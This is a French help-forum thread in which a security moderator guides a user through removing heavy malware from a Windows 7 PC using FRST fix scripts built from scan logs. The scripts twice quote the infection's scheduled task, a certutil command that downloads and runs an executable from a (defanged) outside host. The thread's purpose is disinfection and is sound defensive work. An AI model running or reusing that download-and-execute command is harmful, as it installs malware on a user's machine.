Sujet Précédent Sujet Suivant

Pc très lent presque inutilisable

Fermé
labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020 - Modifié le 30 juin 2020 à 19:15
bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024 - 3 juil. 2020 à 14:57
Bonjour, mon pc est très très lent qu’il en est presque inutilisable je suis sur windows7 et j’ai du réinstaller Windows 7 pour un petit problème. Lors d’une ouverture d’un logiciel cela met 5-10min pour l’ouvrir, des logiciels que je n’ai même pas installé s’installent tout seul sur mon pc, lorsque j’utilise chrome beaucoup de pubs apparaissent toutes les 2min, et aussi mon pc fait énormément de bruit que j’en ai bien peur qu’il explose, il ne faisait pas autant de bruit avant. Je ne sais pas si c’est a cause d’un logiciel que j’ai voulu installer. J’ai essayé de tout nettoyer avec CCleaner et advanced system care mais rien n’y fait. S’il vous plaît aidez moi
A voir également:

4 réponses

Réponse 1 / 4
bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024 18 470
30 juin 2020 à 19:33
Bonjour,
CCleaner et advanced system care sont inutiles.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci :

Puis coche la case shortcut comme ceci :

Clique sur Analyser à la fin de l'analyse tu auras trois fichiers texte sur le bureau FRST, Addition et Shortcut , attention de bien attendre que les messages disant que l'analyse est terminée s'affichent, ensuite envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les trois liens générés par Pjoint dans ton prochain message.

1
labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020
1 juil. 2020 à 22:50
Bonsoir, excusez moi pour ce retard c’est que mon pc est beaucoup trop lent, dès que j’ouvre quelque chose ça prend 5min pour l’ouvrir.

Voici les liens,
FRST : https://pjjoint.malekal.com/files.php?id=FRST_20200701_c15z5c9l6y9

Addition:
https://pjjoint.malekal.com/files.php?id=20200701_j8h15i8m14g11

Shortcut:
https://pjjoint.malekal.com/files.php?id=20200701_y14x14d12t9u11
0
Réponse 2 / 4
bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024 18 470
Modifié le 2 juil. 2020 à 01:22
Pas étonnant que ton pc a du mal à fonctionner il est vraiment très infecté.

Procédure à faire dans l'ordre indiqué :
ATTENTION pour que la désinfection fonctionne il faut démarrer ton pc en mode sans échec avec "prise en charge du réseau".

Pour le démarrage en mode sans échec il suffit de lire attentivement cette page et faire ce qui est indiqué pour démarrer Windows 7 en mode sans échec.
Tu peux imprimer les pages ou prendre des notes car à partir du paragraphe Les options de récupération tu ne seras plus sous Windows tu n'y reviendras qu'une fois en mode sans échec.

Une fois Windows démarré en mode sans échec avec prise en charge du réseau

1- Ouvre FRST
2- Copie l'intégralité du script qui est dans l'encadré qui suit : 
Start::
CloseProcesses:
HKLM-x32\...\Run: [kissq] => C:\Users\Dalal\AppData\Local\Temp\kissq.exe************ [382464 2020-06-30] () [Fichier non signé] 
HKLM\...\RunOnce: [hmhge0fcjm2] => C:\Program Files (x86)\CNoai\367933451.exe [475136 2020-06-19] () [Fichier non signé]
HKLM\...\RunOnce: [system recover] => C:\Program Files (x86)\Adobe\Bolezhegeki.exe [197632 2020-06-30] () [Fichier non signé]
HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Dalal\AppData\Local\Temp\IXP000.TMP\" 
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [KPKZG6SEKLD8LMS] => C:\Program Files\RMHK4DBCUT\RMHK4DBCU.exe [2768384 2020-06-19] (XJC62SX6) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [3KP9HX2E14V7MU5] => C:\Program Files\LK35YI0K3K\R7UCT9PNJ.exe [2768384 2020-06-19] (XJC62SX6) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [2795074] => C:\Users\Dalal\AppData\Roaming\ec0p1nnb4or\2uwloflef5s.exe [853892 2020-06-30] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [ZGJR226UIF8IKLP] => C:\Program Files\QR24AKSM82\QR24AKSM8.exe [4077056 2020-06-30] (ENN426O@) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [efinam] => C:\Program Files (x86)\efinam\efinam.dll [15360 2020-06-30] () [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [ShyViolet] => C:\Windows\rss\csrss.exe [3980800 2020-06-30] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [CloudNet] => C:\Users\Dalal\AppData\Roaming\97ccdcfc9cef\97ccdcfc9cef.exe [549376 2020-06-30] () [Fichier non signé] 
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [6436488] => C:\Users\Dalal\AppData\Roaming\wgeq45r51rf\i3qwbpsbqyz.exe [853892 2020-06-30] () [Fichier non signé] [Fichier en cours d'utilisation]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\Run: [PR7B85B97SMKIV4] => C:\Program Files\B2L2GHKUEJ\B2L2GHKUE.exe [4077056 2020-06-30] (ENN426O@) [Fichier non signé]
HKU\S-1-5-21-1048886537-4227766083-82584293-1000\...\RunOnce: [dnNup] => C:\Users\Dalal\AppData\Local\Temp\25-1ab0e-118-157a1-b92256e3c4a21\Juwadynida.exe [726528 2020-06-30] () [Fichier non signé] 
AppInit_DLLs: C:\ProgramData\AppmallosayoV\Toughtop.dll => C:\ProgramData\AppmallosayoV\Toughtop.dll [342528 2020-06-29] () [Fichier non signé]
AppInit_DLLs-x32: C:\ProgramData\AppmallosayoV\Betala.dll => C:\ProgramData\AppmallosayoV\Betala.dll [460800 2020-06-29] () [Fichier non signé]
InternetURL: C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdrhost.url -> URL: "C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\cdrhost\ZRFCSx.vbs"
Startup: C:\Users\Dalal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2020-06-19]
ShortcutTarget: SmartClock.lnk -> C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe (International GeoGebra Institute) [Fichier non signé]
CHR HKLM\SOFTWARE\Policies\Google: Restriction 
Task: {7F3DE65B-78DB-4AA1-A97F-F782AEEFB4CF} - System32\Tasks\NvNgxUpdateCheckDaily_{78821544-1544-1544-1544-788215441544} => C:\Users\Dalal\AppData\Roaming\grtibts [258560 2020-01-03] () [Fichier non signé]
Task: {83A3C1AB-278A-42F5-AD2C-FEE6F2B94CC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe /31340 
Task: {CF3947EA-1FEC-4059-B78F-4F83A72CE245} - System32\Tasks\Smart Clock => C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe [599552 2020-06-19] (International GeoGebra Institute) [Fichier non signé]
Task: {D6D01BC3-2833-416D-900C-01BA9F5AF671} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3980800 2020-06-30] () [Fichier non signé]
HKLM\SYSTEM\ControlSet001\Services\Voyasollam => C:\ProgramData\\Voyasollam\\Voyasollam.exe [4570624 2020-06-29] () [Fichier non signé]
HKLM\SYSTEM\ControlSet001\Services\{45487F67-EC9F-4449-A6F2-2D0970F9B80B} => C:\Windows\System32\drivers\Wdf64811.sys [6559120 2020-06-19] (Accès refusé)  [Fichier non signé] <==== ATTENTION (Rootkit!/Service verrouillé)
HKLM\SYSTEM\ControlSet001\Services\Voyasollam => C:\ProgramData\\Voyasollam\\Voyasollam.exe [4570624 2020-06-29] () [Fichier non signé] <==== ATTENTION (Rootkit!/Service verrouillé)
R1 97CCDCFC9CEF; C:\Windows\97CCDCFC9CEF.sys [25368 2020-06-19] (大连纵梦网络科技有限公司 -> FsFilter Network)
R2 6A091B04; C:\ProgramData\6A091B04\C9DF6398.dll [4011520 2020-06-29] () [Fichier non signé]
S3 AppmallosayoV; C:\ProgramData\\AppmallosayoV\\AppmallosayoV.exe [4603392 2020-06-24] () [Fichier non signé]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-06-19] () [Fichier non signé] 
R2 ChromeUpdater; C:\Windows\chromesvc.exe [2319872 2020-06-30] () [Fichier non signé]
S3 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4570624 2020-06-29]
S3 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-06-19] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé]
C:\Program Files (x86)\CNoai
C:\Program Files (x86)\Adobe\Bolezhegeki.exe
C:\Program Files\RMHK4DBCUT
C:\Program Files\LK35YI0K3K
C:\Users\Dalal\AppData\Roaming\ec0p1nnb4or
C:\Program Files\QR24AKSM82
C:\Program Files (x86)\efinam
C:\Windows\rss\csrss.exe
C:\Users\Dalal\AppData\Roaming\97ccdcfc9cef
C:\Users\Dalal\AppData\Roaming\wgeq45r51rf
C:\Program Files\B2L2GHKUEJ
C:\ProgramData\AppmallosayoV
C:\Users\Dalal\AppData\Roaming\grtibts
C:\ProgramData\\Voyasollam
C:\ProgramData\6A091B04
C:\ProgramData\\CloudPrinter
C:\Program Files (x86)\ProxyGate
C:\Users\Dalal\AppData\Roaming\Smart Clock
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.

5- Fait une nouvelle analyse FRST et donne les liens dans ta réponse.


6- VÉRIFIE ET DIT-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT.
1
labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020
2 juil. 2020 à 01:18
Merci mais je n’arrive pas à démarrer en mode sans échec avec F8 et même avec f5 pourtant je le fais avant le logo Windows.
0
bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024 18 470 > labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020
2 juil. 2020 à 14:32
Il faut tapoter sur la touche F5 ou F8 comme si tu faisais du morse dés le démarrage du pc c'est à dire même avant le premier écran du bios, dés le démarrage cela signifie dés qu'il démarre avant qu'un écran apparaisse.

Si tu n'y arrives toujours pas:

Va SUR CETTE PAGEtélécharge MALWAREBYTES ANTI-ROOTKIT

Attention lis très très attentivement le paragraphe "Utilisation" avant de commencer.

Une fois le nettoyage fait avec MALWAREBYTES ANTI-ROOTKIT fait une nouvelle analyse avec FRST, met les liens dans ta réponse.


.

0
labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020 > bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024
2 juil. 2020 à 19:54
Bonjour, je vous remercie infiniment !! Mon pc est devenu beaucoup plus fluide ! Mais le démarrage reste lent.

voici les liens:

FRST : https://pjjoint.malekal.com/files.php?id=FRST_20200702_z7t7s119y13

Addition : https://pjjoint.malekal.com/files.php?id=20200702_c13q13o6e14o6

Shortcut : https://pjjoint.malekal.com/files.php?id=20200702_o11m8f8s6i10
0
bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024 18 470 > labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020
Modifié le 2 juil. 2020 à 20:34
Il reste encore pas mal de choses mais c'est beaucoup mieux.
Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit : 
Start::
CreateRestorePoint:
CloseProcesses:
InternetURL: C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdrhost.url -> URL: "C:\Users\akram.zoubir.lafamilia-PC\AppData\Roaming\cdrhost\ZRFCSx.vbs"
HKLM-x32\...\Run: [kissq] => C:\Users\Dalal\AppData\Local\Temp\kissq.exe************
CHR HKLM\SOFTWARE\Policies\Google: Restriction
Task: {7F3DE65B-78DB-4AA1-A97F-F782AEEFB4CF} - System32\Tasks\NvNgxUpdateCheckDaily_{78821544-1544-1544-1544-788215441544} => C:\Users\Dalal\AppData\Roaming\grtibts.exe
Task: {83A3C1AB-278A-42F5-AD2C-FEE6F2B94CC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Dalal\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {CF3947EA-1FEC-4059-B78F-4F83A72CE245} - System32\Tasks\Smart Clock => C:\Users\Dalal\AppData\Roaming\Smart Clock\SmartClock.exe
R1 97CCDCFC9CEF; C:\Windows\97CCDCFC9CEF.sys [25368 2020-06-19] (大连纵梦网络科技有限公司 -> FsFilter Network)
S3 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a
C:\Users\Dalal\AppData\Roaming\Smart Clock
C:\Windows\system32\Tasks\Smart Clock
C:\Users\Dalal\AppData\Roaming\grtibts.exe
C:\ProgramData\CloudPrinter
C:\Program Files (x86)\ProxyGate
RemoveProxy:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet https://forums.commentcamarche.net/forum/affich-37585758-reinitialiser-son-navigateur

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


7- Fait une nouvelle analyse FRST

0
labellgoss Messages postés 15 Date d'inscription samedi 30 mai 2020 Statut Membre Dernière intervention 18 août 2020 > bazfile Messages postés 53683 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 24 avril 2024
2 juil. 2020 à 21:05
Voici le lien en question : https://pjjoint.malekal.com/files.php?id=20200702_b12v8k6d13k9
0
Réponse 3 / 4
ThaBestGamer Messages postés 94 Date d'inscription mercredi 27 mai 2020 Statut Membre Dernière intervention 11 janvier 2021
Modifié le 2 juil. 2020 à 14:18
Bonsoir ,

Ces symptômes présente le comportement d'un cheval de troie ou un logiciel publicitaire !

Ce qui peut provoquer la perte de données, le vol des informations , le dommage de ton système !

Ici télécharge kaspersky virus removal tool en mode sans échec avec prise en charge du réseau :
https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool

exécute le puis scan ton pc et nettoyer !
tu ne ne sais pas maintenant si les malware ont volé tes informations ou non !

Quel est le logiciel , le fichier que tu as exécuté avant que ces symptôme n'apparaissent ?

télécharge malwarebytes Anti malware en mode sans échec et corrige tous les virus dans le registre et efface les fichiers temporaires par ce que là normalement ce trouvent les ficheirs des virus ;

C:\Users\(Nom d'utlilisateur)\Appdata\Local\Temp
Puis efface tous les fichiers là , Attention n'efface pas le dossiers mais les fichiers et les dossiers à l'intérieur de lui

J'espère t'aider
-1
Réponse 4 / 4
Profil bloqué
Modifié le 2 juil. 2020 à 17:21
Bonjour.
Il faut surtout faire du tri dans tes programmes (ceux que tu n'utilises pas) et faire un scan avec un bon antivirus. Tu peux aussi aller dans le gestionnaire des tâches (Ctrl + Maj + Echap) et aller dans l'onglet "Démarrage", puis vérifier que les programmes inutiles ne se lancent pas au démarrage. En espérant avoir pu t'aider. Bon courage !



***** Signature modifiée par la modération
Ne pas s'attribuer la fonction de contributeur dans sa signature quand on ne l'est pas.
-4